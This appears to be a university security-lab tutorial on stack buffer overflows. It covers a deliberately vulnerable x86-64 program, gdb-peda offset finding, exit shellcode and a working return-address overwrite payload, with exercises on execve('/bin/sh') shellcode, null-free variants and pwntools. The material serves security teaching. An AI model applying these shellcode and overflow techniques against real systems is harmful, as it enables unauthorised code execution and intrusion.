Whenever an attacker manages to overwrite the return address, their primary follow-up is to divert the execution flow to their advantage. One can gain a stable foothold inside the exploited system via spawning a shell from the vulnerable application.
This can be accomplished by injecting code into the application's memory (stack, heap or by other means) and diverting the execution flow to that code. Please note the following prerequisites in order for this to work:
Since the injected code's outcome is commonly that of spawning a shell, the name “shellcode” is used to describe a wide array of such code snippets. A “shellcode” could also create a new socket, or read the contents of a file and print it to the standard output.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Note that this has a system-wide effect. To launch a single executable with ASLR disabled, use:
setarch $(uname -m) -R <executable>
(You can pass a shell as the executable and all processes launched by that shell will also have ASLR disabled.)
You can also use Ghidra/IDA tool in order to analyze the binaries and the disassembled code. You can read more about using IDA here.
For this tutorial, our goal is to write, inject and use a simple shellcode. In the following steps, we will analyze a simple program, test payloads, assess the vulnerability, then create a shellcode and exploit the program. We will use a very simple shellcode, one that does:
exit(1337);
We have the following blatantly vulnerable program:
extern gets extern printf section .data formatstr: db "Enjoy your leak: %p",0xa,0 section .text global main main: push rbp mov rbp, rsp sub rsp, 64 lea rbx, [rbp - 64] mov rsi, rbx mov rdi, formatstr call printf mov rdi, rbx call gets leave ret
You may already see what the vulnerability consists of.
We are going to use some of PEDA's features to our advantage:
gdb-peda$ pattc 100 # Generate a De Bruijn pattern of length 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ r <<< 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' Starting program: vuln 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' Here is your leek: 0x7fffffffdc30 Program received signal SIGSEGV, Segmentation fault. Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x7fffffffdc90 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") RBX: 0x7fffffffdc90 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") RCX: 0x7ffff7dcfa00 --> 0xfbad2088 RDX: 0x7ffff7dd18d0 --> 0x0 RSI: 0x602671 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n") RDI: 0x7fffffffdc91 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") RBP: 0x4141334141644141 ('AAdAA3AA') RSP: 0x7fffffffdcd8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL") RIP: 0x400567 (<main+39>: ret) R8 : 0x6026d5 --> 0x0 R9 : 0x0 R10: 0x602010 --> 0x0 R11: 0x246 R12: 0x400450 (<_start>: xor ebp,ebp) R13: 0x7fffffffddb0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x0000000000400567 in main () gdb-peda$ patto AAdAA3AA AAdAA3AA found at offset: 64
Notice that the program crashed. We can quickly determine that the program tried to return to 0x4141334141644141, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group “AAdAA3AA” found at offset 64 in the pattern. This offset is where the old RBP is situated relative to our input.
Now that we know the offset from the beginning of the buffer (and also, our input) as being 72, we can attempt to reliably crash the program to a destination of our choice. Let's try having 'BBBBBB' as our return address, or 0x0000424242424242, preceded by 72 'A's.
We can construct this test sequence using python from the command line:
python -c "print('A'*72 + 'BBBBBB')"
We can now rerun the binary under gdb and see what happens.
gdb-peda$ r <<< `python -c "print('A'*72 + 'BBBBBB')"` Starting program: /home/stefania/cns-labs-2018/lab-06/skel/vuln <<< `python -c "print('A'*72 + 'BBBBBB')"` Enjoy your leak: 0x7fffffffdc90 Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB") RBX: 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB") RCX: 0x7ffff7dcfa00 --> 0xfbad2088 RDX: 0x7ffff7dd18d0 --> 0x0 RSI: 0x602671 ('A' <repeats 71 times>, "BBBBBB\n") RDI: 0x7fffffffdc91 ('A' <repeats 71 times>, "BBBBBB") RBP: 0x4141414141414141 ('AAAAAAAA') RSP: 0x7fffffffdce0 --> 0x1 RIP: 0x424242424242 ('BBBBBB') R8 : 0x6026bf --> 0x0 R9 : 0x0 R10: 0x602010 --> 0x0 R11: 0x246 R12: 0x400450 (<_start>: xor ebp,ebp) R13: 0x7fffffffddb0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x424242424242 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdce0 --> 0x1 0008| 0x7fffffffdce8 --> 0x7fffffffddb8 --> 0x7fffffffe15f ("/home/stefania/cns-labs-2018/lab-06/skel/vuln") 0016| 0x7fffffffdcf0 --> 0x100008000 0024| 0x7fffffffdcf8 --> 0x400540 (<main>: push rbp) 0032| 0x7fffffffdd00 --> 0x0 0040| 0x7fffffffdd08 --> 0x8efa2a609ebbe932 0048| 0x7fffffffdd10 --> 0x400450 (<_start>: xor ebp,ebp) 0056| 0x7fffffffdd18 --> 0x7fffffffddb0 --> 0x1 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x0000424242424242 in ?? ()
Excellent!
Shellcode is typically written in assembly, due to memory constraints.
How do we start writing our exit shellcode? First, we need to know how system calls are performed on our target platform (x86 in our case).
Each system call has a specific number which identifies it. This number must be stored in RAX. Next, the arguments of the system call are placed in RDI, RSI, RDX, R10. R8, R9 in this order. A special software interrupt is used to issue the actual system call, syscall.
Consult the Linux x64 ABI here
We need to place 60 (exit's system call number) in RAX, and the value of exit's single argument in RDI.
Our shellcode will look as follows:
BITS 64 mov rdi, 42 mov rax, 60 syscall
But we can't pass it as assembly instructions to the application; we need to assemble it into binary as well.
nasm shellcode_exit.S -o shell.bin
We now need this binary code as a stream of hex values in order to use python/perl/echo to feed it into the application.
hexdump -v -e '1/1 "\\"' -e '1/1 "x%02x"' shell.bin ; echo
or
xxd -c 1 -p shell.bin | awk '{ print "\\x" $0 }' | paste -sd ""
or just use the conveniently supplied bin_to_hex.sh script.
In order to test your shellcode, you can use xxd to export the shellcode as a C array and test it using the test_shellcode program in the archive.
xxd -i shell.bin > shellcode
By running test_shellcode under strace, you can check to see exactly if the system call was performed, and with which arguments. If all else fails, gdb.
strace -e exit ./test_shellcode exit(42) = ? +++ exited with 42 +++
Use the supplied bin_to_hex.sh script to convert a binary file to a hex representation. First, let's determine the length of our shellcode:
wc -c shell.bin 12 shell.bin
Next, we'll need to fill our buffer up to 72 characters until the saved return address is reached on the stack.
python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12))"
Now we need to find the beginning of our buffer on the stack in order to return to it. Repeat the experiment and set a breakpoint at the leave instruction. Write down the address of the beginning of your buffer on the stack, cause that's where the shellcode will end up.
gdb-peda$ b *0x0000000000400566 Breakpoint 2 at 0x400566 gdb-peda$ r <<< `python -c "print ('A'*72 + 'BBBBBB')"` Starting program: /home/stefania/cns-labs-2018/lab-06/skel/vuln <<< `python -c "print ('A'*72 + 'BBBBBB')"` Enjoy your leak: 0x7fffffffdc90 [----------------------------------registers-----------------------------------] RAX: 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB") RBX: 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB") RCX: 0x7ffff7dcfa00 --> 0xfbad2088 RDX: 0x7ffff7dd18d0 --> 0x0 RSI: 0x602671 ('A' <repeats 71 times>, "BBBBBB\n") RDI: 0x7fffffffdc91 ('A' <repeats 71 times>, "BBBBBB") RBP: 0x7fffffffdcd0 ("AAAAAAAABBBBBB") RSP: 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB") RIP: 0x400566 (<main+38>: leave) R8 : 0x6026bf --> 0x0 R9 : 0x0 R10: 0x602010 --> 0x0 R11: 0x246 R12: 0x400450 (<_start>: xor ebp,ebp) R13: 0x7fffffffddb0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x400559 <main+25>: call 0x400430 <printf@plt> 0x40055e <main+30>: mov rdi,rbx 0x400561 <main+33>: call 0x400440 <gets@plt> => 0x400566 <main+38>: leave 0x400567 <main+39>: ret 0x400568 <main+40>: nop DWORD PTR [rax+rax*1+0x0] 0x400570 <__libc_csu_init>: push r15 0x400572 <__libc_csu_init+2>: push r14 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB") 0008| 0x7fffffffdc98 ('A' <repeats 64 times>, "BBBBBB") 0016| 0x7fffffffdca0 ('A' <repeats 56 times>, "BBBBBB") 0024| 0x7fffffffdca8 ('A' <repeats 48 times>, "BBBBBB") 0032| 0x7fffffffdcb0 ('A' <repeats 40 times>, "BBBBBB") 0040| 0x7fffffffdcb8 ('A' <repeats 32 times>, "BBBBBB") 0048| 0x7fffffffdcc0 ('A' <repeats 24 times>, "BBBBBB") 0056| 0x7fffffffdcc8 ('A' <repeats 16 times>, "BBBBBB") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 2, 0x0000000000400566 in main ()
python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12) + b'\x90\xdc\xff\xff\xff\x7f')" > payload gdb-peda$ r < payload Starting program: vuln < payload Enjoy your leak: 0x7fffffffdc90 [Inferior 1 (process 11615) exited with code 052] Warning: not running or target is remote
Now test the payload in gdb! Break at ret and see the control flow continuing on the stack and executing exit.
Then try running the experiment outside of gdb. Does it still work? Why or why not?
In order to circumvent frustration, we've leaked the stack address of the buffer in the binary.
Sometimes, you won't have access to the binary and only have a leaked address of some description. You can add this instruction in your shellcode
jmp 0x0
and vary the overwritten return address. If the program stops responding, then it means that it has reached your shellcode.
Stack addresses aren't always stable. To circumvent is, buffer space permitting, you can inject a large number of 'nop' instructions (no operation) prior to the actual shellcode. In this way, if you return to any of the injected nop instructions, the execution flow will reach your shellcode. To better illustrate:
Your exploit may spawn a shell, and yet it shuts off instantly. That's because the newly spawned shell isn't waiting on any input. A workaround to this problem is to append stdin to the payload, as follows:
$ cat payload - | ./vuln
If your process is not cat
but something else (like python), you can place it in a subshell, chained with a no-args cat
(whose behavior is simply to replicate stdin
to stdout
:
$ (python -c "print('something')" && cat) | ./vuln
In this way, after the shell spawns, you can interact with it.
All content necessary for the CNS laboratory tasks can be found in the CNS public repository.
Using the same vulnerable binary, write a shellcode which performs the following:
write(1, "Hello World!\n", 13);
Again, inspect the Linux x64 ABI.
BITS 64 jmp string start: pop rsi ; pop address of `hello` variable in rsi (the 2nd syscall argument on 64 bits) [...] syscall ; do syscall on 64 bits string: call start ; jump/trampoline back to start while storing the address of `hello` on the stack hello: db "Hello World!", 0xa, 0
The call
instruction will push the address of the next “instruction” (in this case, our string), onto the stack.
Now for the real challenge, write a shellcode which actually spawns a shell. The equivalent C call is the following:
execve("/bin/sh", ["/bin/sh", NULL], NULL);
Where [”/bin/sh”, NULL]
denotes the address of the array of two strings address: the address of the ”/bin/sh”
string and the NULL
address.
”/bin/sh”
on the stack.
You can do this using the hack from the write challenge.
Inspect the code of vuln2.asm. What changed? How is your input passed?
Some functions, such as strcpy, sprintf and strcat stop whenever a NULL byte is reached. If you inspect your previous shellcodes using xxd, you will notice that they have plenty of NULL ('0x00') bytes in them, so your lifelong dream for world domination will be cut short whenever these functions are used.
However, there's more than one way to skin a cat to write assembly. Convert your previous shellcode into one that contains no NULLs and use it to exploit vuln2.
mov <reg>, 0 <-> xor <reg>, <reg> mov <reg>, value <-> push value, pop <reg>
Lastly, let's use pwntools to do most of the work for us and exploit vuln once more. Fill in the values in skel_pwn.py and run the script.